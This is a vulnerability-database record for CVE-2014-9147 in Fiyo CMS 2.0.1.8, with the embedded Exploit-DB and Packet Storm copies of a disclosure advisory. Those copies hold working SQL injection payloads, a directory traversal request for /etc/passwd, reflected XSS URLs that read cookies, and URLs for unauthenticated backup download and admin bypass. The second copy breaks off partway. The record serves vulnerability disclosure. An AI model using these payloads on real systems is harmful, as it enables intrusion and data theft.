ID CVE-2014-9147
Type cve
Reporter cve@mitre.org
Modified 2017-10-25T19:44:00
Description
Fiyo CMS 2.0.1.8 allows remote attackers to obtain sensitive information via a direct request to the database backup file in .backup/.
{"id": "CVE-2014-9147", "bulletinFamily": "NVD", "title": "CVE-2014-9147", "description": "Fiyo CMS 2.0.1.8 allows remote attackers to obtain sensitive information via a direct request to the database backup file in .backup/.", "published": "2017-10-16T15:29:00", "modified": "2017-10-25T19:44:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9147", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/131165/FiyoCMS-2.0.1.8-XSS-SQL-Injection-URL-Bypass.html", "https://www.exploit-db.com/exploits/36581/", "http://www.securityfocus.com/bid/73437"], "cvelist": ["CVE-2014-9147"], "type": "cve", "lastseen": "2019-05-29T18:13:49", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "125a1833fb2853910181d95f903c815b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "1612c23da16f57ad3c3780135ce631ee"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "f30109dfdbfbf783c0b61792a6b2c20a"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "cwe", "hash": "b647a850fd42b235dd11ee60cf626f2d"}, {"key": "description", "hash": "d9c41e178045a2fc37f797eedf04b804"}, {"key": "href", "hash": "ee93e0eef59ca09df32e80459030d5fa"}, {"key": "modified", "hash": "b67907a809c77a147fe400cada97fece"}, {"key": "published", "hash": "d3b4946765ee9ddf8b7f396db00e78c3"}, {"key": "references", "hash": "17dbaa67f8a042e8b9f6cf17302f8f7b"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "ca12ebf5c47d0c3b353b6dbb885acc48"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "73943bd1158a2fb4d8f09b45abe175e6dbbb1e01332917e743b80e2142000a36", "viewCount": 0, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2019-05-29T18:13:49"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:36581"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131165"]}], "modified": "2019-05-29T18:13:49"}, "vulnersScore": 5.6}, "objectVersion": "1.3", "cpe": [], "affectedSoftware": [{"name": "fiyo fiyo_cms", "operator": "le", "version": "2.0.1.8"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": [], "cwe": ["CWE-200"]}
{"exploitdb": [{"lastseen": "2016-02-04T03:49:42", "bulletinFamily": "exploit", "description": "Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities. CVE-2014-1222,CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148. Webapps exploit for php platform", "modified": "2015-03-31T00:00:00", "published": "2015-03-31T00:00:00", "id": "EDB-ID:36581", "href": "https://www.exploit-db.com/exploits/36581/", "type": "exploitdb", "title": "Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities", "sourceData": "# Exploit Title: FiyoCMS Multiple Vulnerabilities\r\n# Date: 29 March 2015\r\n# Exploit Author: Mahendra\r\n# Vendor Homepage: www.fiyo.org\r\n# Software Link: http://sourceforge.net/projects/fiyo-cms/\r\n# Version: 2.0.1.8, other version might be vulnerable.\r\n# Tested : Kali Linux 1.0.9a-amd64\r\n# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148\r\n\r\n*Advisory Timeline*\r\n30-11-2014: Vendor notified and responded back\r\n01-12-2014: Vulnerabilities provided to vendor\r\n03-14-2015: Vendor released newer version claimed to fix the vulnerabilities\r\n29-03-2015: Advisory released\r\n\r\n----------------------------------------------------\r\nFiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass\r\n----------------------------------------------------\r\n*Advisory details*\r\n\r\nSeveral security issues have been identified on the latest FiyoCMS platform.\r\n\r\n\r\n*Proof of Concept (PoC)*\r\n\r\n----------------------------------------------------\r\nMultiple SQL Injection - CVE-2014-9145\r\n----------------------------------------------------\r\n\r\n* PoC:\r\n\r\nhttp://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli]\r\n\r\n* Sqlmap:\r\n\r\nParameter: id\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 10 columns\r\n Payload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL > 5.0.11 AND time-based blind\r\n Payload: app=user&act=edit&id=1 AND SLEEP(5)\r\n\r\n* PoC:\r\n\r\nhttp://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n* Sqlmap:\r\n\r\nParameter: cat\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n Payload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 10 columns\r\n Payload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL < 5.0.12 AND time-based blind (heavy query)\r\n Payload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\nParameter: level\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n Payload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Pqqp'='Pqqp&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 10 columns\r\n Payload: cat=&user=&level=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71666f7671,0x6163446a67456e557a48,0x7164687671),NULL,NULL,NULL#&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL < 5.0.12 AND time-based blind (heavy query)\r\n Payload: cat=&user=&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hMLH'='hMLH&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n \r\nParameter: user\r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause\r\n Payload: cat=&user=' AND (SELECT 8990 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (8990=8990) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VhKM'='VhKM&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 10 columns\r\n Payload: cat=&user=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4652577247546e6b5241,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL < 5.0.12 AND time-based blind (heavy query)\r\n Payload: cat=&user=' AND 1262=BENCHMARK(5000000,MD5(0x72797451)) AND 'egJe'='egJe&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913\r\n \r\n* PoC:\r\n POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1\r\n Host: 192.168.248.132\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\n Accept: */*\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate\r\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n X-Requested-With: XMLHttpRequest\r\n Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add\r\n Content-Length: 42\r\n Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off\r\n Connection: keep-alive\r\n Pragma: no-cache\r\n Cache-Control: no-cache\r\n\r\n act=email&email=test@asdas.com[sqli]\r\n\r\n* Sqlmap:\r\n\r\nParameter: email\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: act=email&email=test@asdas.com' AND 5514=5514 AND 'KTqH'='KTqH\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL > 5.0.11 AND time-based blind\r\n Payload: act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT\r\n\r\n* PoC:\r\n\r\n POST /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/1.1\r\n Host: 192.168.248.132\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\n Accept: */*\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate\r\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n X-Requested-With: XMLHttpRequest\r\n Referer: http://192.168.248.132/fiyo/dapur/index.php?app=user&act=add\r\n Content-Length: 34\r\n Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off\r\n Connection: keep-alive\r\n Pragma: no-cache\r\n Cache-Control: no-cache\r\n\r\n act=user&username=test[sqli]\r\n\r\n* Sqlmap:\r\n\r\nParameter: username\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL > 5.0.11 AND time-based blind\r\n Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT\r\n\r\n--------------------------------------------------------------------\r\nDirectory Traversal - kcfinder plugins - CVE-2014-1222\r\n--------------------------------------------------------------------\r\n\r\nFiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack.\r\n\r\nPOST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1\r\nHost: 192.168.248.132\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.248.132/fiyo//plugins/plg_kcfinder/browse.php?type=files\r\nCookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 34\r\n\r\ndir=files&file=../../../../../../../etc/passwd\r\n\r\n----------------------------------------------------\r\nReflected XSS - CVE-2014-9146\r\n----------------------------------------------------\r\n\r\nhttp://192.168.248.132/fiyo/?app=article&view=item31ab2\"><script>alert(1)</script>0ccba&id=186\r\nhttp://192.168.248.132/fiyo/?app=article&view=item&id=18690fdb\"><script>alert(1)</script>d99c9\r\nhttp://192.168.248.132/fiyo/?page=5eac15eac1\"><script>alert(1)</script>774f2\r\nhttp://192.168.248.132/fiyo/?app=article95ce1\"><script>alert(1)</script>298ab&view=item&id=186\r\nhttp://192.168.248.132/fiyo/dapur/index.php?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5\r\n\r\n\r\n----------------------------------------------------\r\nDirect URL Access - CVE-2014-9147\r\n----------------------------------------------------\r\nTo download database backup without any authentications required.\r\nhttp://192.168.248.132/fiyo/.backup/[db_backup.sql filename]\r\n\r\n----------------------------------------------------\r\nAccess Control Bypass - CVE-2014-9148\r\n----------------------------------------------------\r\n\r\nTo access super administrator functions \"Install & Update\" and \"Backup\" by administrator user, just go directly to the URL below:\r\n 1. http://192.168.248.132/fiyo/dapur/?app=config&view=backup\r\n 2. http://192.168.248.132/fiyo/dapur/?app=config&view=install", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36581/"}], "packetstorm": [{"lastseen": "2016-12-05T22:14:33", "bulletinFamily": "exploit", "description": "", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "href": "https://packetstormsecurity.com/files/131165/FiyoCMS-2.0.1.8-XSS-SQL-Injection-URL-Bypass.html", "id": "PACKETSTORM:131165", "type": "packetstorm", "title": "FiyoCMS 2.0.1.8 XSS / SQL Injection / URL Bypass", "sourceData": "`# Exploit Title: FiyoCMS Multiple Vulnerabilities \n# Date: 29 March 2015 \n# Exploit Author: Mahendra \n# Vendor Homepage: www.fiyo.org \n# Software Link: http://sourceforge.net/projects/fiyo-cms/ \n# Version: 2.0.1.8, other version might be vulnerable. \n# Tested : Kali Linux 1.0.9a-amd64 \n# CVE(s): CVE-2014-9145,CVE-2014-9146,CVE-2014-9147,CVE-2014-9148 \n \n*Advisory Timeline* \n30-11-2014: Vendor notified and responded back \n01-12-2014: Vulnerabilities provided to vendor \n03-14-2015: Vendor released newer version claimed to fix the vulnerabilities \n29-03-2015: Advisory released \n \n---------------------------------------------------- \nFiyoCMS 2.0.1.8 SQL injection, XSS, Direct URL bypass \n---------------------------------------------------- \n*Advisory details* \n \nSeveral security issues have been identified on the latest FiyoCMS platform. \n \n \n*Proof of Concept (PoC)* \n \n---------------------------------------------------- \nMultiple SQL Injection - CVE-2014-9145 \n---------------------------------------------------- \n \n* PoC: \n \nhttp://192.168.248.132/fiyo/dapur/index.php?app=user&act=edit&id=1[sqli] \n \n* Sqlmap: \n \nParameter: id \nType: UNION query \nTitle: MySQL UNION query (NULL) - 10 columns \nPayload: app=user&act=edit&id=-7672 UNION ALL SELECT NULL,NULL,CONCAT(0x7171676471,0x66457070464452786c58,0x716a767471),NULL,NULL,NULL,NULL,NULL,NULL,NULL# \n \nType: AND/OR time-based blind \nTitle: MySQL > 5.0.11 AND time-based blind \nPayload: app=user&act=edit&id=1 AND SLEEP(5) \n \n* PoC: \n \nhttp://192.168.248.132/fiyo/dapur/apps/app_article/controller/article_list.php?cat=[sqli]&user=[sqli]&level=[sqli]&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \n* Sqlmap: \n \nParameter: cat \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clause \nPayload: cat=' AND (SELECT 4352 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (4352=4352) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'yeEe'='yeEe&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: UNION query \nTitle: MySQL UNION query (NULL) - 10 columns \nPayload: cat=' UNION ALL SELECT NULL,CONCAT(0x71666f7671,0x4f654364434f746c7477,0x7164687671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nType: AND/OR time-based blind \nTitle: MySQL < 5.0.12 AND time-based blind (heavy query) \nPayload: cat=' AND 2332=BENCHMARK(5000000,MD5(0x4a495770)) AND 'RlLS'='RlLS&user=&level=&sEcho=1&iColumns=7&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&_=1417159921913 \n \nParameter: level \nType: error-based \nTitle: MySQL >= 5.0 AND error-based - WHERE or HAVING clause \nPayload: cat=&user=&level=' AND (SELECT 6522 FROM(SELECT COUNT(*),CONCAT(0x71666f7671,(SELECT (CASE WHEN (6522=6522) THEN 1 ELSE 0 END)),0x7164687671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 